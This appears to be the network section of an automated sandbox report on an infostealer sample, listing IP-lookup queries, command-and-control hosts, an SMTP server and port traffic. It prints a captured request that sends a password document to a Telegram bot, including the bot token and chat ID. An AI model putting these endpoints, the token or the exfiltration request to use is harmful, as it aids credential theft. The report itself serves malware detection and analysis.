                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                      Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                      Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                      Source: global trafficDNS traffic detected: DNS query: us2.smtp.mailhostbox.com
                      Source: global trafficDNS traffic detected: DNS query: 206.23.85.13.in-addr.arpa
                      Source: unknownHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcd9999c7f3372Host: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 19 Sep 2024 10:21:20 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 19 Sep 2024 10:21:32 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                      Source: RegSvcs.exe, 00000003.00000002.4537810663.0000000002C77000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4538128302.00000000027D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
                      Source: name.exe, 00000002.00000002.2100522966.0000000003740000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000005.00000002.2230016057.0000000003F40000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4535184676.0000000000374000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                      Source: name.exe, 00000002.00000002.2100522966.0000000003740000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4537810663.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4534989521.0000000000433000.00000040.80000000.00040000.00000000.sdmp, name.exe, 00000005.00000002.2230016057.0000000003F40000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4538128302.0000000002711000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                      Source: name.exe, 00000002.00000002.2100522966.0000000003740000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4537810663.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4534989521.0000000000433000.00000040.80000000.00040000.00000000.sdmp, name.exe, 00000005.00000002.2230016057.0000000003F40000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4538128302.0000000002711000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                      Source: RegSvcs.exe, 00000003.00000002.4537810663.0000000002FF5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4537810663.0000000002F5D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4537810663.0000000002F3B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4537810663.0000000003157000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4537810663.0000000003186000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4538128302.0000000002BE8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4538128302.0000000002D44000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4538128302.0000000002ADD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4538128302.0000000002AF4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4538128302.0000000002B56000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4538128302.0000000002B66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                      Source: RegSvcs.exe, 00000003.00000002.4537810663.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4538128302.0000000002711000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                      Source: RegSvcs.exe, 00000003.00000002.4537810663.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4538128302.0000000002711000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                      Source: name.exe, 00000002.00000002.2100522966.0000000003740000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000005.00000002.2230016057.0000000003F40000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4535184676.0000000000374000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                      Source: RegSvcs.exe, 00000003.00000002.4537810663.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4538128302.0000000002711000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: RegSvcs.exe, 00000003.00000002.4537810663.0000000002F51000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4537810663.0000000002FF5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4537810663.0000000002F5D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4537810663.0000000003157000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4537810663.0000000003186000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4538128302.0000000002D44000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4538128302.0000000002ADD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4538128302.0000000002AF4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4538128302.0000000002B56000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4538128302.0000000002B66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://us2.smtp.mailhostbox.com
                      Source: name.exe, 00000002.00000002.2100522966.0000000003740000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4537810663.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4534989521.0000000000433000.00000040.80000000.00040000.00000000.sdmp, name.exe, 00000005.00000002.2230016057.0000000003F40000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4538128302.0000000002711000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                      Source: RegSvcs.exe, 00000003.00000002.4540108777.0000000003B91000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4540335552.0000000003733000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                      Source: RegSvcs.exe, 00000006.00000002.4538128302.0000000002D44000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4538128302.0000000002B66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram
                      Source: RegSvcs.exe, 00000003.00000002.4537810663.0000000002FF5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4537810663.0000000002C30000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4537810663.0000000002F5D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4537810663.0000000002C77000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4537810663.0000000002F3B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4537810663.0000000003157000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4537810663.0000000002D82000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4537810663.0000000003186000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4538128302.0000000002D44000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4538128302.00000000027D0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4538128302.0000000002ADD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4538128302.0000000002924000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4538128302.0000000002AF4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4538128302.0000000002B56000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4538128302.0000000002B66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                      Source: RegSvcs.exe, 00000006.00000002.4538128302.0000000002B66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                      Source: RegSvcs.exe, 00000003.00000002.4537810663.0000000002C30000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4538128302.00000000027D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                      Source: RegSvcs.exe, 00000003.00000002.4537810663.0000000002C30000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4538128302.00000000027D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965543%0D%0ADate%20a
                      Source: RegSvcs.exe, 00000006.00000002.4538128302.0000000002B66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=4039
                      Source: RegSvcs.exe, 00000003.00000002.4540108777.0000000003B91000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4540335552.0000000003733000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: RegSvcs.exe, 00000003.00000002.4540108777.0000000003B91000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4540335552.0000000003733000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                      Source: RegSvcs.exe, 00000003.00000002.4540108777.0000000003B91000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4540335552.0000000003733000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: RegSvcs.exe, 00000003.00000002.4537810663.0000000002C77000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4538128302.00000000027D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                      Source: RegSvcs.exe, 00000003.00000002.4540108777.0000000003B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: RegSvcs.exe, 00000003.00000002.4540108777.0000000003B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: RegSvcs.exe, 00000003.00000002.4540108777.0000000003B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: RegSvcs.exe, 00000003.00000002.4537810663.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4537810663.0000000002C30000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4538128302.00000000027D0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4538128302.0000000002711000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                      Source: name.exe, 00000002.00000002.2100522966.0000000003740000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4537810663.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, name.exe, 00000005.00000002.2230016057.0000000003F40000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4535184676.0000000000374000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4538128302.0000000002711000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                      Source: RegSvcs.exe, 00000006.00000002.4538128302.0000000002711000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
                      Source: RegSvcs.exe, 00000003.00000002.4537810663.0000000002BEB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4537810663.0000000002C30000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4538128302.00000000027D0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4538128302.000000000278B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
                      Source: RegSvcs.exe, 00000003.00000002.4540108777.0000000003B91000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4540335552.0000000003733000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                      Source: RegSvcs.exe, 00000003.00000002.4540108777.0000000003B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                      Source: RegSvcs.exe, 00000003.00000002.4537810663.0000000002C77000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4538128302.00000000027D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61522 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61602 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61631 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61622
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61623
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61619 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61626
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61628
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61539 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61648 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61563 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61666 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61513
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61634
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61636
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61614 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61637
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61517
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61591 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61574 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61630
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61631
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61637 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61671 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61694 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61523
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61644
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61645
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61526
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61648
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61528
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61649
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61575 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61640
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61520
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61641
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61688 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61522
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61626 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61586 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61544 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61534
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61535
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61656
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61700 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61658
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61538
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61539
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61660 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61530
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61652
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61538 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61532
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61653
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61708
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61587 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61709
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61526 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61658 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61558 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61700
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61702
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61704
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61706
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61630 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61712 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61598 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61603 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61676 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61641 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61618 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61712
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61713
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61706 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61532 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61570 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61713 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61520 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61608 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61608
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61609
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61698 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61600
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61602
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61603
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61605
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61571 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61653 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61619
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61636 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61670 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61612
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61582 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61559 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61614
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61616
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61618
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61681 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61590
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61591
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61692 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61583 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61640 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61582
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61583
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61663 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61586
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61554 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61587
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61680 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61594 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61628 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61634 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61542 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61702 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61594
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61595
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61645 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61598
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61595 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61652 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61566 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61547 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61623 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61708 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61612 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61530 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61609 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61513 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61555 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61685 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61709 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61696 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61673 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61666
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61546
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61667
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61547
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61644 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61590 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61660
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61662
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61542
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61550 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61663
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61535 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61667 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61544
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61546 -> 443
